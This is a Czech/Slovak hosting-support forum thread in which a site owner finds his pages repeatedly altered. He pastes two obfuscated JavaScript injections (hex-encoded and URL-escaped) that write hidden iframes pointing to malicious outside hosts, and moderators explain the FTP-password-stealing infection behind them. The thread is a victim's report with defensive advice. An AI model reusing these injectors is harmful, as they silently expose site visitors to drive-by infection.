Blueboard shoutbox. Vkládání nežádoucího skriptu.

1.Mám na webe schout box od blueboardu a už druhý krát mi zmizol!
Zostáva po nom len toto
<!-- BLUEBOARD SHOUTBOARD -->

<!-- BLUEBOARD SHOUTBOARD KONEC -->
to hlavné chýba.

2.V jednom súbore sa mi objavil nejaký čudný script. Súbor som vymazal a nahral znovu a script tam bol zas!
Ako je to možné?

<HTML>Momentálně tam Shoutboard normálně vidím. Nebylo by vhodnější řešit toto u BB?

Co se týče toho skriptu, tak s ukázkou by to bylo lepší. Ale doporučovala bych použít antivirus apod. a projít počítač. Tipuju to na nějaký vir v PC.

<small>Téma přejmenováno. Příště vymysli lepší název.</small></HTML>

V pc určite nič neni ten script je :
< script>function v4837d67100114(v4837d67104e42){ function v4837d67109cd5 () {return 16;} return(parseInt(v4837d67104e42,v4837d67109cd5()));}function v4837d67113acd(v4837d671186bc){ var v4837d6712711e=2; var v4837d6711d81d='';for(v4837d67122412=0; v4837d67122412<v4837d671186bc.length; v4837d67122412+=v4837d6712711e){ v4837d6711d81d+=(String.fromCharCode(v4837d67100114(v4837d671186bc.substr(v4837d67122412, v4837d6712711e))));}return v4837d6711d81d;} document.write(v4837d67113acd('3C696672616D65206E616D653D276627207372633D27687474703A2F2F61726368696D656433332E72752F61646D696E2F7061636B2F696E6465782E706870272077696474683D373431206865696768743D333434207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

Schoutboard som tam už vrátil a neni chyba u BB lebo mi to mizne tu na webzdarma. Zo súboru index.php zmizol celý kód toho schoutboardu a to BB nemá ako spraviť.

zmenil som si heslo ak sa to stane ešte raz tak to nechám tak a napíšem sem

zase sa mi tam vlozil nejaky script :
< Script Language='Javascript'>
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%73%6F%63%6B%73%6C%69%6E%65%2E%63%6E%2F%61%64%2F%69%6E%64%65%78%2E%70%68%70%27%20%77%69%64%74%68%3D%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E'));
</script>

na ftp som nic nenahraval a v pc nic nemam (win bol preinstalovany vo stvrtok)

tak to som zvedavý aké máte vysvetlenie na toto

Web som zrušil a napísal tam oznámenie že je zrušený (bolo to začiatkom decembra) odvtedy som sa k ftp ani nepripájal a nič neupravoval.

A čo je to v indexe teraz? stránka sa pokúša infikovať každého návštevníka
kde sa to tam zobralo? hm


P.S.: aby som si overil či to nieje len v mojom prehliadači chyba tak som sa pripojil k ftp a pozrel do indexu a skutočne je tam niečo iné ako by malo byť

<HTML>Už se to tu řešilo asi stokrát - máte vir. Víme, co je to za vir, co to dělá a jak funguje - a my s tím skutečně nic společného nemáme, ten vir u nás neběží a rozhodně nenapadá náhodné weby. Smiřte se s tím, že máte zavirovaný počítač - pořiďte si antivir (pokud možno ten nejlepší - NOD32), proskenujte si počítač, nainstalujte si firewall (pokud jej v systému nemáte), upravte nastavení FTP klienta, aby si nikam neukládal hesla (heslo si máte pamatovat, proto je to heslo) a heslo si změňte. Nahrajte soubor na web znova a ručím vám, že pokud se budete držet pokynu "neukládat si nikam heslo," tak se vám tam ten vir nevkrade.</HTML>

<HTML>2Milos: a podíval ses i odkud byl poslední přístup na ftp? Asi by ses dost divil :-) A díval ses na datum poslední změny souborů? To by ses divil ještě víc :-)) Někdo prostě nějak získal tvoje heslo, nejspíš pomocí viru či jiné havěti v tvém pc. Tady máš ukázku z logu, jako příklad soubor index.php - byl stažen a za pár sekund opět nahrán z IP odněkud v Číně:

<code>
[03/Feb/2009:01:37:02 +0000] hmilos.chytrak.cz 24415 /index.php 210.83.85.94 RETR [226]
[03/Feb/2009:01:37:05 +0000] hmilos.chytrak.cz 19403 /index.php 210.83.85.94 STOR [226]
</code>

</HTML>

Stačí, když uživatel navštíví infikovanou stránku. Virus (vlastně harvester) odešle do Číny soubor c:\windows\wcx_ftp.ini s uloženými hesly k FTP. Tam už čeká šikovný robůtek, který z toho souboru vyďobe tato hesla a změní soubory - vloží do nich další infekci.

Tyjo - to je lepší než večerníček! :-))

....ale nod nic nezjistí!

... a co by měl zjistit? Antiviráky jen zavírají kurník, když je kuna uvnitř.

<HTML>Co používám NOD, tak ten ty skripty vždycky deaktivuje smazáním špičaté závorky u tagu script, nebo je maže úplně.</HTML>